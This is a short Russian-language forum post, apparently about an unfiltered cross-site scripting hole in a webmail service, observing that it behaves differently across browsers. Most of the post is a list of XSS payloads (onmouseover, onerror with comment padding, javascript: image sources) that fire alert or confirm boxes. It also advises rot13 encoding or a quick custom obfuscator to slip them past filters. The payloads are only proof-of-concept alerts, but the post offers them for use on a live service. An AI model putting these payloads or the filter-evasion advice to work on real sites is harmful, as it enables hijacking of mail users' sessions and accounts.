yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
это уязвимость работает в разных браузерах по разному ,одно заметил что после при получении письма не возвращает хсс ,просмотрел исходный код не фильтрует ,тут появилась новая задачка почему так,а если взять function rot13 ниже перечисленные скрипты могут сработать там но в разных браузерах <SELECT NAME="" onmouseover=alert(123)> <img wa="wa" src="http://img.imgsmail.ru/0.gif" width="0" height="0"/> >">/**/<img /**/src=foo.png/**/ onerror=alert(/xssed/)/**/ /**> <img src="javascript:confirm(/lo/)"> <IMG SRC=javascript:alert('XSS')> нужно шифровать ,а лучше написать побыстрому свой Обфускатор кода вам видней
|